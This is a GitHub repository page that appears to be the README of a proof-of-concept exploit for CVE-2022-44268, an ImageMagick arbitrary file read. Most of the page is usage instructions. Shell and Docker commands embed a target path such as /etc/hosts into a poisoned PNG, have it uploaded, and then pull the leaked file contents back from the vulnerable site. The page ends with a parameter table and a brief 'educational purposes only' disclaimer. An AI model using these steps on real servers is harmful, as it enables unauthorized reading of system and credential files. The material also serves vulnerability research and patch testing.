Skip to content

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

Notifications You must be signed in to change notification settings

kljunowsky/CVE-2022-44268

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

Video 📼

https://youtu.be/quKxwNAMBIA

Usage 🛠

Poison the image ☣️

python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.

Check if exploit was successful 🗡

python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Running from Docker 🐳

Build

docker build -t cve-2022-44268 .

Run

docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Parameters 🧰

Parameter Description Type
--url The URL of the uploaded PNG image String
--image Input PNG file File
--output Output PNG file File
--file-to-read File to read from vulnerable host String

Contact Me📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Educational purposes only and cannot be used for law violation or personal gain.

The author of this project is not responsible for any possible harm caused by the materials of this project.